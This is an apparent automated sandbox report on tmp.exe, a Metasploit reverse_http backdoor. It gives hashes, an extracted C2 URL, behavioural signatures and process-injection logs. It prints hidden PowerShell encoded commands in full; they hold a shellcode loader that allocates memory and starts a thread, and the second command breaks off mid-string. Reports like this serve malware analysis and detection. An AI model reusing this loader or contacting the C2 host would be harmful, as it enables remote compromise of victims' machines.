metasploit | b71a19618582e3820d4c6f184180eca70e097fbd4b35bae3615e99651d97d9e2

General

Target

tmp.exe
Size

128KB
MD5

2b5c5ac56b819bd05ab3151efc814303
SHA1

9e4cb9c54e4243998d6c9c1916ac147741c21382
SHA256

b71a19618582e3820d4c6f184180eca70e097fbd4b35bae3615e99651d97d9e2
SHA512

543129bb5543460735a1b12e7b828532bf95277a24e6be5cb1675c0281bb65913f7c51b6e4bf3f162ea11f044bfd0239c51c74d80747c595b392eaf8023419e5
SSDEEP

1536:ju2Jqy4AutHymEUGwFBP3Dp7+MO11U3NsVGlJ:Rqy4AutHLVUBsRlJ

Score

10^/10

metasploit backdoor trojan

Malware Config

Extracted

Family

metasploit

Version

encoder/shikata_ga_nai

Extracted

Family

metasploit

Version

windows/reverse_http

C2

http://vms.h4ck0ps.cc:8181/lLCGJlVNxPkoOSk4TOsBzgZtRiWWm

Signatures

MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
trojan backdoor metasploit

Blocklisted process makes network request 1 IoCs

flow	pid	Process
5	1996	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 3 IoCs

pid	Process
2580	powershell.exe
1356	powershell.exe
1996	powershell.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
1716	dw20.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	2580	powershell.exe
Token: SeDebugPrivilege	1356	powershell.exe
Token: SeDebugPrivilege	1996	powershell.exe

Suspicious use of WriteProcessMemory 22 IoCs

description	pid	Process	procid_target
PID 2252 wrote to memory of 2580	2252	tmp.exe	28
PID 2252 wrote to memory of 2580	2252	tmp.exe	28
PID 2252 wrote to memory of 2580	2252	tmp.exe	28
PID 2580 wrote to memory of 1356	2580	powershell.exe	30
PID 2580 wrote to memory of 1356	2580	powershell.exe	30
PID 2580 wrote to memory of 1356	2580	powershell.exe	30
PID 1356 wrote to memory of 1996	1356	powershell.exe	31
PID 1356 wrote to memory of 1996	1356	powershell.exe	31
PID 1356 wrote to memory of 1996	1356	powershell.exe	31
PID 1356 wrote to memory of 1996	1356	powershell.exe	31
PID 1996 wrote to memory of 2980	1996	powershell.exe	32
PID 1996 wrote to memory of 2980	1996	powershell.exe	32
PID 1996 wrote to memory of 2980	1996	powershell.exe	32
PID 1996 wrote to memory of 2980	1996	powershell.exe	32
PID 2980 wrote to memory of 1080	2980	csc.exe	33
PID 2980 wrote to memory of 1080	2980	csc.exe	33
PID 2980 wrote to memory of 1080	2980	csc.exe	33
PID 2980 wrote to memory of 1080	2980	csc.exe	33
PID 1996 wrote to memory of 1716	1996	powershell.exe	36
PID 1996 wrote to memory of 1716	1996	powershell.exe	36
PID 1996 wrote to memory of 1716	1996	powershell.exe	36
PID 1996 wrote to memory of 1716	1996	powershell.exe	36

C:\Users\Admin\AppData\Local\Temp\tmp.exe
"C:\Users\Admin\AppData\Local\Temp\tmp.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2252
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -window hidden -EncodedCommand JAB0AHIAMABwACAAPQAgACcAJABVAGQAegBiACAAPQAgACcAJwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgASQBuAHQAUAB0AHIAIABsAHAAQQBkAGQAcgBlAHMAcwAsACAAdQBpAG4AdAAgAGQAdwBTAGkAegBlACwAIAB1AGkAbgB0ACAAZgBsAEEAbABsAG8AYwBhAHQAaQBvAG4AVAB5AHAAZQAsACAAdQBpAG4AdAAgAGYAbABQAHIAbwB0AGUAYwB0ACkAOwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQAQQB0AHQAcgBpAGIAdQB0AGUAcwAsACAAdQBpAG4AdAAgAGQAdwBTAHQAYQBjAGsAUwBpAHoAZQAsACAASQBuAHQAUAB0AHIAIABsAHAAUwB0AGEAcgB0AEEAZABkAHIAZQBzAHMALAAgAEkAbgB0AFAAdAByACAAbABwAFAAYQByAGEAbQBlAHQAZQByACwAIAB1AGkAbgB0ACAAZAB3AEMAcgBlAGEAdABpAG8AbgBGAGwAYQBnAHMALAAgAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEkAZAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAbQBzAHYAYwByAHQALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAG0AZQBtAHMAZQB0ACgASQBuAHQAUAB0AHIAIABkAGUAcwB0ACwAIAB1AGkAbgB0ACAAcwByAGMALAAgAHUAaQBuAHQAIABjAG8AdQBuAHQAKQA7ACcAJwA7ACQAdwAgAD0AIABBAGQAZAAtAFQAeQBwAGUAIAAtAG0AZQBtAGIAZQByAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAFUAZAB6AGIAIAAtAE4AYQBtAGUAIAAiAFcAaQBuADMAMgAiACAALQBuAGEAbQBlAHMAcABhAGMAZQAgAFcAaQBuADMAMgBGAHUAbgBjAHQAaQBvAG4AcwAgAC0AcABhAHMAcwB0AGgAcgB1ADsAWwBCAHkAdABlAFsAXQBdADsAWwBCAHkAdABlAFsAXQBdACQAegAgAD0AIAAwAHgAYgA4ACwAMAB4ADkANgAsADAAeAA2ADMALAAwAHgANgA3ACwAMAB4ADkANAAsADAAeABkAGIALAAwAHgAZABjACwAMAB4AGQAOQAsADAAeAA3ADQALAAwAHgAMgA0ACwAMAB4AGYANAAsADAAeAA1AGUALAAwAHgAMgBiACwAMAB4AGMAOQAsADAAeABiADEALAAwAHgANQBlACwAMAB4ADgAMwAsADAAeABlAGUALAAwAHgAZgBjACwAMAB4ADMAMQAsADAAeAA0ADYALAAwAHgAMQAxACwAMAB4ADAAMwAsADAAeAA0ADYALAAwAHgAMQAxACwAMAB4AGUAMgAsADAAeAA2ADMALAAwAHgAOQBmACwAMAB4ADgAZgAsADAAeAAxAGIALAAwAHgAOABiACwAMAB4ADYAMAAsADAAeAA1ADAALAAwAHgANAA0ACwAMAB4AGIAYQAsADAAeABiADIALAAwAHgAMwA0ACwAMAB4ADAAZgAsADAAeABlAGUALAAwAHgAMAAyACwAMAB4ADMAZQAsADAAeAA1AGQALAAwAHgAMAAyACwAMAB4AGUAYQAsADAAeABhADUALAAwAHgAZQA5ACwAMAB4ADQAOAAsADAAeABmADgALAAwAHgAMgBhACwAMAB4ADUAOQAsADAAeAAyADYALAAwAHgAMgA2ACwAMAB4ADAANAAsADAAeAA1AGEALAAwAHgAMwBkACwAMAB4ADUANAAsADAAeAA0AGUALAAwAHgAOQA1ACwAMAB4ADgAMQAsADAAeAAzADUALAAwAHgAYgAyACwAMAB4AGIANAAsADAAeAA3AGQALAAwAHgANAA0ACwAMAB4AGUANwAsADAAeAAxADYALAAwAHgAYgBjACwAMAB4ADgANwAsADAAeABmAGEALAAwAHgANQA3ACwAMAB4AGYAOQAsADAAeAA1ADEALAAwAHgANwAwACwAMAB4AGIANwAsADAAeAA1ADcALAAwAHgAZQA5ACwAMAB4ADIAOAAsADAAeAA1ADcALAAwAHgAMAAwACwAMAB4ADYANgAsADAAeAA4AGUALAAwAHgANgBiACwAMAB4AGEAZgAsADAAeABhADgALAAwAHgAOAA0ACwAMAB4AGQANAAsADAAeABkADcALAAwAHgAYwBkACwAMAB4ADUAYgAsADAAeABhADAALAAwAHgANgBiACwAMAB4AGMAZgAsADAAeAA4AGIALAAwAHgAYwAyACwAMAB4ADIAYgAsADAAeABlAGYALAAwAHgANwBiACwAMAB4AGQANAAsADAAeAAxADgALAAwAHgANgA0ACwAMAB4ADMAMwAsADAAeABjAGUALAAwAHgAMQBiACwAMAB4AGIAMgAsADAAeABiADAALAAwAHgAZAAyACwAMAB4ADEAMgAsADAAeABiAGEALAAwAHgANwAwACwAMAB4AGEAMAAsADAAeAA2ADAALAAwAHgAYwBmACwAMAB4ADgAMgAsADAAeAA2ADAALAAwAHgAYgA5ACwAMAB4ADAAZgAsADAAeAAyADgALAAwAHgANABkACwAMAB4ADcANgAsADAAeAA4ADIALAAwAHgAMwAwACwAMAB4ADgAOQAsADAAeABiADAALAAwAHgANwBkACwAMAB4ADQANwAsADAAeABlADEALAAwAHgAYwAzACwAMAB4ADAAMAAsADAAeAA1ADAALAAwAHgAMwAyACwAMAB4AGIAZQAsADAAeABkAGUALAAwAHgAZAA1ACwAMAB4AGEANQAsADAAeAAxADgALAAwAHgAOQA0ACwAMAB4ADQAZQAsADAAeAAwADIALAAwAHgAOQA5ACwAMAB4ADcAOQAsADAAeAAwADgALAAwAHgAYwAxACwAMAB4ADkANQAsADAAeAAzADYALAAwAHgANQBlACwAMAB4ADgAZAAsADAAeABiADkALAAwAHgAYwA5ACwAMAB4AGIAMwAsADAAeABhADUALAAwAHgAYwA1ACwAMAB4ADQAMgAsADAAeAAzADIALAAwAHgANgBhACwAMAB4ADQAYwAsADAAeAAxADAALAAwAHgAMQAxACwAMAB4AGEAZQAsADAAeAAxADUALAAwAHgAYwAyACwAMAB4ADMAOAAsADAAeABmADcALAAwAHgAZgAzACwAMAB4AGEANQAsADAAeAA0ADUALAAwAHgAZQA3ACwAMAB4ADUAYgAsADAAeAAxADkALAAwAHgAZQAwACwAMAB4ADYAMwAsADAAeAA0ADkALAAwAHgANABjACwAMAB4ADkANAAsADAAeAA4AGIALAAwAHgAOQAyACwAMAB4ADcAMQAsADAAeABjADgALAAwAHgAMQBiACwAMAB4ADAAMgAsADAAeABlAGIALAAwAHgAOAA3ACwAMAB4AGQAYgAsADAAeABiADIALAAwAHgAOAA0ACwAMAB4ADAAZQAsADAAeABiADIALAAwAHgAMgBiACwAMAB4ADMAZgAsADAAeABiADkALAAwAHgAMAA2ACwAMAB4AGQAYwAsADAAeAA5ADkALAAwAHgAMwBlACwAMAB4ADYAOAAsADAAeABmADcALAAwAHgAZAA3ACwAMAB4ADkAYgAsADAAeABjADUALAAwAHgAYQA0ACwAMAB4ADQANAAsADAAeAA0AGYALAAwAHgAYgA5ACwAMAB4ADIAMgAsADAAeAA1ADEALAAwAHgAMwA5ACwAMAB4ADQANAAsADAAeAAxADUALAAwAHgANQBhACwAMAB4ADEAMAAsADAAeABlADUALAAwAHgAMABhACwAMAB4AGMAZgAsADAAeAA5ADgALAAwAHgANQA5ACwAMAB4AGYAZgAsADAAeAA2ADcALAAwAHgANgBhACwAMAB4ADQAMgAsADAAeABmAGYALAAwAHgANwA3ACwAMAB4ADcAYwAsADAAeABlADEALAAwAHgAZgBmACwAMAB4ADcANwAsADAAeAA3AGMALAAwAHgAMwA1ACwAMAB4ADkAMwAsADAAeAAzAGIALAAwAHgAMwBmACwAMAB4ADAAZQAsADAAeAAyADEALAAwAHgAYQA4ACwAMAB4AGUAOQAsADAAeABkAGUALAAwAHgAYwBkACwAMAB4ADYAMAAsADAAeAA3AGQALAAwAHgAYgAwACwAMAB4ADYAMgAsADAAeABkADIALAAwAHgAZQBhACwAMAB4ADcAYQAsADAAeAAyADgALAAwAHgAOQBiACwAMAB4ADkAZgAsADAAeABjADAALAAwAHgAYQBhACwAMAB4ADQANAAsADAAeAAzAGEALAAwAHgAYgAxACwAMAB4ADEAOAAsADAAeABlADIALAAwAHgAZQBkACwAMAB4ADYAZQAsADAAeABmADEALAAwAHgAZgA0ACwAMAB4ADQAMQAsADAAeABmADkALAAwAHgANQBlACwAMAB4ADcAYwAsADAAeABmAGUALAAwAHgAMwBmACwAMAB4ADkAZgAsADAAeABhAGIALAAwAHgAOAA4ACwAMAB4ADAANgAsADAAeAAwAGMALAAwAHgAMwBjACwAMAB4ADgAYgAsADAAeAA4ADQALAAwAHgAZABhACwAMAB4ADMAOAAsADAAeABkADgALAAwAHgAZABiACwAMAB4ADQAOQAsADAAeAAxADYALAAwAHgAOABjACwAMAB4ADgAZAAsADAAeAAwADUALAAwAHgANwAzACwAMAB4ADYANwAsADAAeAAxAGMALAAwAHgAZQBlACwAMAB4ADcAYwAsADAAeAA1AGQALAAwAHgAZgA2ACwAMAB4ADcAYQAsADAAeAA4ADkALAAwAHgAMAAxACwAMAB4AGEANAAsADAAeAAyADkALAAwAHgAZABlACwAMAB4AGUAZQAsADAAeAAxAGMALAAwAHgAYQA1ACwAMAB4AGMAZAAsADAAeAAxADYALAAwAHgAYgA5ACwAMAB4ADQAZQAsADAAeABmADEALAAwAHgAYwAyACwAMAB4ADMAYwAsADAAeAA3ADAALAAwAHgANwA4ACwAMAB4AGYAYgAsADAAeAA1ADYALAAwAHgAZgA4ACwAMAB4ADkAMAAsADAAeAAwADMALAAwAHgAYQA3ACwAMAB4ADkAMAAsADAAeABkADIALAAwAHgAZgAzACwAMAB4ADkAMgAsADAAeAA4ADAALAAwAHgAMgA0ACwAMAB4ADIANgAsADAAeAA5ADMALAAwAHgAMwA1ACwAMAB4ADMAYQAsADAAeABhADEALAAwAHgAZABjACwAMAB4ADAAMAAsADAAeAAxAGUALAAwAHgANgA0ACwAMAB4AGUAMgAsADAAeABiAGYALAAwAHgAMwA1ACwAMAB4AGMAOQAsADAAeAA3ADQALAAwAHgAMwBmACwAMAB4AGQAYQAsADAAeABjADkALAAwAHgAOAA0ACwAMAB4ADUANwAsADAAeABkAGEALAAwAHgAYwA5ACwAMAB4AGMANAAsADAAeABhADcALAAwAHgAOAA5ACwAMAB4AGEAMQAsADAAeAA5AGMALAAwAHgAMAAzACwAMAB4ADcAZQAsADAAeABkADcALAAwAHgAZQAyACwAMAB4ADkAZQAsADAAeAAxADIALAAwAHgANAA0ACwAMAB4ADQAZQAsADAAeABhADkALAAwAHgAZgAyACwAMAB4ADMAYwAsADAAeAAxADgALAAwAHgAYQA5ACwAMAB4AGQAYwAsADAAeABjADIALAAwAHgAZAA4ACwAMAB4AGYAYQAsADAAeAA0AGEALAAwAHgAYQBiACwAMAB4AGMAYQAsADAAeAA2AGEALAAwAHgAZgBiACwAMAB4AGMAOQAsADAAeAAxADQALAAwAHgANAA3ACwAMAB4ADcAOQAsADAAeABjAGQALAAwAHgAOQBmACwAMAB4AGEAYQAsADAAeAAwADkALAAwAHgAYwA5ACwAMAB4ADUAZQAsADAAeABmADcALAAwAHgAOABiACwAMAB4ADEANgAsADAAeAAxADUALAAwAHgAMQAyACwAMAB4AGMAYgAsADAAeAA1ADUALAAwAHgAOAA5ACwAMAB4ADMANAAsADAAeAA5ADEALAAwAHgAYQA2ACwAMAB4AGMAOQAsADAAeAAzAGIALAAwAHgAMQBjACwAMAB4ADMANAAsADAAeAA0ADUALAAwAHgAZQBkACwAMAB4ADgAOQAsADAAeABmADIALAAwAHgAYwBhACwAMAB4ADkAYQAsADAAeAA3ADkALAAwAHgAOABiACwAMAB4ADcAZgAsADAAeAA3ADIALAAwAHgAMQA5ACwAMAB4ADAAOAAsADAAeAA4ADAAOwAkAGcAIAA9ACAAMAB4ADEAMAAwADAAOwBpAGYAIAAoACQAegAuAEwAZQBuAGcAdABoACAALQBnAHQAIAAwAHgAMQAwADAAMAApAHsAJABnACAAPQAgACQAegAuAEwAZQBuAGcAdABoAH0AOwAkAHcANwBPAD0AJAB3ADoAOgBWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoADAALAAwAHgAMQAwADAAMAAsACQAZwAsADAAeAA0ADAAKQA7AGYAbwByACAAKAAkAGkAPQAwADsAJABpACAALQBsAGUAIAAoACQAegAuAEwAZQBuAGcAdABoAC0AMQApADsAJABpACsAKwApACAAewAkAHcAOgA6AG0AZQBtAHMAZQB0ACgAWwBJAG4AdABQAHQAcgBdACgAJAB3ADcATwAuAFQAbwBJAG4AdAAzADIAKAApACsAJABpACkALAAgACQAegBbACQAaQBdACwAIAAxACkAfQA7ACQAdwA6ADoAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKAAwACwAMAAsACQAdwA3AE8ALAAwACwAMAAsADAAKQA7AGYAbwByACAAKAA7ADsAKQB7AFMAdABhAHIAdAAtAHMAbABlAGUAcAAgADYAMAB9ADsAJwA7ACQAZQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBUAG8AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAQgB5AHQAZQBzACgAJAB0AHIAMABwACkAKQA7ACQAegBJADcAIAA9ACAAIgAtAGUAbgBjACAAIgA7AGkAZgAoAFsASQBuAHQAUAB0AHIAXQA6ADoAUwBpAHoAZQAgAC0AZQBxACAAOAApAHsAJABNAFMAWQAgAD0AIAAkAGUAbgB2ADoAUwB5AHMAdABlAG0AUgBvAG8AdAAgACsAIAAiAFwAcwB5AHMAdwBvAHcANgA0AFwAVwBpAG4AZABvAHcAcwBQAG8AdwBlAHIAUwBoAGUAbABsAFwAdgAxAC4AMABcAHAAbwB3AGUAcgBzAGgAZQBsAGwAIgA7AGkAZQB4ACAAIgAmACAAJABNAFMAWQAgACQAegBJADcAIAAkAGUAIgB9AGUAbABzAGUAewA7AGkAZQB4ACAAIgAmACAAcABvAHcAZQByAHMAaABlAGwAbAAgACQAegBJADcAIAAkAGUAIgA7AH0A
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2580
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -window hidden -EncodedCommand JAB0AHIAMABwACAAPQAgACcAJABVAGQAegBiACAAPQAgACcAJwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgASQBuAHQAUAB0AHIAIABsAHAAQQBkAGQAcgBlAHMAcwAsACAAdQBpAG4AdAAgAGQAdwBTAGkAegBlACwAIAB1AGkAbgB0ACAAZgBsAEEAbABsAG8AYwBhAHQAaQBvAG4AVAB5AHAAZQAsACAAdQBpAG4AdAAgAGYAbABQAHIAbwB0AGUAYwB0ACkAOwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQAQQB0AHQAcgBpAGIAdQB0AGUAcwAsACAAdQBpAG4AdAAgAGQAdwBTAHQAYQBjAGsAUwBpAHoAZQAsACAASQBuAHQAUAB0AHIAIABsAHAAUwB0AGEAcgB0AEEAZABkAHIAZQBzAHMALAAgAEkAbgB0AFAAdAByACAAbABwAFAAYQByAGEAbQBlAHQAZQByACwAIAB1AGkAbgB0ACAAZAB3AEMAcgBlAGEAdABpAG8AbgBGAGwAYQBnAHMALAAgAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEkAZAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAbQBzAHYAYwByAHQALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAG0AZQBtAHMAZQB0ACgASQBuAHQAUAB0AHIAIABkAGUAcwB0ACwAIAB1AGkAbgB0ACAAcwByAGMALAAgAHUAaQBuAHQAIABjAG8AdQBuAHQAKQA7ACcAJwA7ACQAdwAgAD0AIABBAGQAZAAtAFQAeQBwAGUAIAAtAG0AZQBtAGIAZQByAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAFUAZAB6AGIAIAAtAE4AYQBtAGUAIAAiAFcAaQBuADMAMgAiACAALQBuAGEAbQBlAHMAcABhAGMAZQAgAFcAaQBuADMAMgBGAHUAbgBjAHQAaQBvAG4AcwAgAC0AcABhAHMAcwB0AGgAcgB1ADsAWwBCAHkAdABlAFsAXQBdADsAWwBCAHkAdABlAFsAXQBdACQAegAgAD0AIAAwAHgAYgA4ACwAMAB4ADkANgAsADAAeAA2ADMALAAwAHgANgA3ACwAMAB4ADkANAAsADAAeABkAGIALAAwAHgAZABjACwAMAB4AGQAOQAsADAAeAA3ADQALAAwAHgAMgA0ACwAMAB4AGYANAAsADAAeAA1AGUALAAwAHgAMgBiACwAMAB4AGMAOQAsADAAeABiADEALAAwAHgANQBlACwAMAB4ADgAMwAsADAAeABlAGUALAAwAHgAZgBjACwAMAB4ADMAMQAsADAAeAA0ADYALAAwAHgAMQAxACwAMAB4ADAAMwAsADAAeAA0ADYALAAwAHgAMQAxACwAMAB4AGUAMgAsADAAeAA2ADMALAAwAHgAOQBmACwAMAB4ADgAZgAsADAAeAAxAGIALAAwAHgAOABiACwAMAB4ADYAMAAsADAAeAA1ADAALAAwAHgANAA0ACwAMAB4AGIAYQAsADAAeABiADIALAAwAHgAMwA0ACwAMAB4ADAAZgAsADAAeABlAGUALAAwAHgAMAAyACwAMAB4ADMAZQAsADAAeAA1AGQALAAwAHgAMAAyACwAMAB4AGUAYQAsADAAeABhADUALAAwAHgAZQA5ACwAMAB4ADQAOAAsADAAeABmADgALAAwAHgAMgBhACwAMAB4ADUAOQAsADAAeAAyADYALAAwAHgAMgA2ACwAMAB4ADAANAAsADAAeAA1AGEALAAwAHgAMwBkACwAMAB4ADUANAAsADAAeAA0AGUALAAwAHgAOQA1ACwAMAB4ADgAMQAsADAAeAAzADUALAAwAHgAYgAyACwAMAB4AGIANAAsADAAeAA3AGQALAAwAHgANAA0ACwAMAB4AGUANwAsADAAeAAxADYALAAwAHgAYgBjACwAMAB4ADgANwAsADAAeABmAGEALAAwAHgANQA3ACwAMAB4AGYAOQAsADAAeAA1ADEALAAwAHgANwAwACwAMAB4AGIANwAsADAAeAA1ADcALAAwAHgAZQA5ACwAMAB4ADIAOAAsADAAeAA1ADcALAAwAHgAMAAwACwAMAB4ADYANgAsADAAeAA4AGUALAAwAHgANgBiACwAMAB4AGEAZgAsADAAeABhADgALAAwAHgAOAA0ACwAMAB4AGQANAAsADAAeABkADcALAAwAHgAYwBkACwAMAB4ADUAYgAsADAAeABhADAALAAwAHgANgBiACwAMAB4AGMAZgAsADAAeAA4AGIALAAwAHgAYwAyACwAMAB4ADIAYgAsADAAeABlAGYALAAwAHgANwBiACwAMAB4AGQANAAsADAAeAAxADgALAAwAHgANgA0ACwAMAB4ADMAMwAsADAAeABjAGUALAAwAHgAMQBiACwAMAB4AGIAMgAsADAAeABiADAALAAwAHgAZAAyACwAMAB4ADEAMgAsADAAeABiAGEALAAwAHgANwAwACwAMAB4AGEAMAAsADAAeAA2ADAALAAwAHgAYwBmACwAMAB4ADgAMgAsADAAeAA2ADAALAAwAHgAYgA5ACwAMAB4ADAAZgAsADAAeAAyADgALAAwAHgANABkACwAMAB4ADcANgAsADAAeAA4ADIALAAwAHgAMwAwACwAMAB4ADgAOQAsADAAeABiADAALAAwAHgANwBkACwAMAB4ADQANwAsADAAeABlADEALAAwAHgAYwAzACwAMAB4ADAAMAAsADAAeAA1ADAALAAwAHgAMwAyACwAMAB4AGIAZQAsADAAeABkAGUALAAwAHgAZAA1ACwAMAB4AGEANQAsADAAeAAxADgALAAwAHgAOQA0ACwAMAB4ADQAZQAsADAAeAAwADIALAAwAHgAOQA5ACwAMAB4ADcAOQAsADAAeAAwADgALAAwAHgAYwAxACwAMAB4ADkANQAsADAAeAAzADYALAAwAHgANQBlACwAMAB4ADgAZAAsADAAeABiADkALAAwAHgAYwA5ACwAMAB4AGIAMwAsADAAeABhADUALAAwAHgAYwA1ACwAMAB4ADQAMgAsADAAeAAzADIALAAwAHgANgBhACwAMAB4ADQAYwAsADAAeAAxADAALAAwAHgAMQAxACwAMAB4AGEAZQAsADAAeAAxADUALAAwAHgAYwAyACwAMAB4ADMAOAAsADAAeABmADcALAAwAHgAZgAzACwAMAB4AGEANQAsADAAeAA0ADUALAAwAHgAZQA3ACwAMAB4ADUAYgAsADAAeAAxADkALAAwAHgAZQAwACwAMAB4ADYAMwAsADAAeAA0ADkALAAwAHgANABjACwAMAB4ADkANAAsADAAeAA4AGIALAAwAHgAOQAyACwAMAB4ADcAMQAsADAAeABjADgALAAwAHgAMQBiACwAMAB4ADAAMgAsADAAeABlAGIALAAwAHgAOAA3ACwAMAB4AGQAYgAsADAAeABiADIALAAwAHgAOAA0ACwAMAB4ADAAZQAsADAAeABiADIALAAwAHgAMgBiACwAMAB4ADMAZgAsADAAeABiADkALAAwAHgAMAA2ACwAMAB4AGQAYwAsADAAeAA5ADkALAAwAHgAMwBlACwAMAB4ADYAOAAsADAAeABmADcALAAwAHgAZAA3ACwAMAB4ADkAYgAsADAAeABjADUALAAwAHgAYQA0ACwAMAB4ADQANAAsADAAeAA0AGYALAAwAHgAYgA5ACwAMAB4ADIAMgAsADAAeAA1ADEALAAwAHgAMwA5ACwAMAB4ADQANAAsADAAeAAxADUALAAwAHgANQBhACwAMAB4ADEAMAAsADAAeABlADUALAAwAHgAMABhACwAMAB4AGMAZgAsADAAeAA5ADgALAAwAHgANQA5ACwAMAB4AGYAZgAsADAAeAA2ADcALAAwAHgANgBhACwAMAB4ADQAMgAsADAAeABmAGYALAAwAHgANwA3ACwAMAB4ADcAYwAsADAAeABlADEALAAwAHgAZgBmACwAMAB4ADcANwAsADAAeAA3AGMALAAwAHgAMwA1ACwAMAB4ADkAMwAsADAAeAAzAGIALAAwAHgAMwBmACwAMAB4ADAAZQAsADAAeAAyADEALAAwAHgAYQA4ACwAMAB4AGUAOQAsADAAeABkAGUALAAwAHgAYwBkACwAMAB4ADYAMAAsADAAeAA3AGQALAAwAHgAYgAwACwAMAB4ADYAMgAsADAAeABkADIALAAwAHgAZQBhACwAMAB4ADcAYQAsADAAeAAyADgALAAwAHgAOQBiACwAMAB4ADkAZgAsADAAeABjADAALAAwAHgAYQBhACwAMAB4ADQANAAsADAAeAAzAGEALAAwAHgAYgAxACwAMAB4ADEAOAAsADAAeABlADIALAAwAHgAZQBkACwAMAB4ADYAZQAsADAAeABmADEALAAwAHgAZgA0ACwAMAB4ADQAMQAsADAAeABmADkALAAwAHgANQBlACwAMAB4ADcAYwAsADAAeABmAGUALAAwAHgAMwBmACwAMAB4ADkAZgAsADAAeABhAGIALAAwAHgAOAA4ACwAMAB4ADAANgAsADAAeAAwAGMALAAwAHgAMwBjACwAMAB4ADgAYgAsADAAeAA4ADQALAAwAHgAZABhACwAMAB4ADMAOAAsADAAeABkADgALAAwAHgAZABiACwAMAB4ADQAOQAsADAAeAAxADYALAAwAHgAOABjACwAMAB4ADgAZAAsADAAeAAwADUALAAwAHgANwAzACwAMAB4ADYANwAsADAAeAAxAGMALAAwAHgAZQBlACwAMAB4ADcAYwAsADAAeAA1AGQALAAwAHgAZgA2ACwAMAB4ADcAYQAsADAAeAA4ADkALAAwAHgAMAAxACwAMAB4AGEANAAsADAAeAAyADkALAAwAHgAZABlACwAMAB4AGUAZQAsADAAeAAxAGMALAAwAHgAYQA1ACwAMAB4AGMAZAAsADAAeAAxADYALAAwAHgAYgA5ACwAMAB4ADQAZQAsADAAeABmADEALAAwAHgAYwAyACwAMAB4ADMAYwAsADAAeAA3ADAALAAwAHgANwA4ACwAMAB4AGYAYgAsADAAeAA1ADYALAAwAHgAZgA4ACwAMAB4ADkAMAAsADAAeAAwADMALAAwAHgAYQA3ACwAMAB4ADkAMAAsADAAeABkADIALAAwAHgAZgAzACwAMAB4ADkAMgAsADAAeAA4ADAALAAwAHgAMgA0ACwAMAB4ADIANgAsADAAeAA5ADMALAAwAHgAMwA1ACwAMAB4ADMAYQAsADAAeABhADEALAAwAHgAZABjACwAMAB4ADAAMAAsADAAeAAxAGUALAAwAHgANgA0ACwAMAB4AGUAMgAsADAAeABiAGYALAAwAHgAMwA1ACwAMAB4AGMAOQAsADAAeAA3ADQALAAwAHgAMwBmACwAMAB4AGQAYQAsADAAeABjADkALAAwAHgAOAA0ACwAMAB4ADUANwAsADAAeABkAGEALAAwAHgAYwA5ACwAMAB4AGMANAAsADAAeABhADcALAAwAHgAOAA5ACwAMAB4AGEAMQAsADAAeAA5AGMALAAwAHgAMAAzACwAMAB4ADcAZQAsADAAeABkADcALAAwAHgAZQAyACwAMAB4ADkAZQAsADAAeAAxADIALAAwAHgANAA0ACwAMAB4ADQAZQAsADAAeABhADkALAAwAHgAZgAyACwAMAB4ADMAYwAsADAAeAAxADgALAAwAHgAYQA5ACwAMAB4AGQAYwAsADAAeABjADIALAAwAHgAZAA4ACwAMAB4AGYAYQAsAD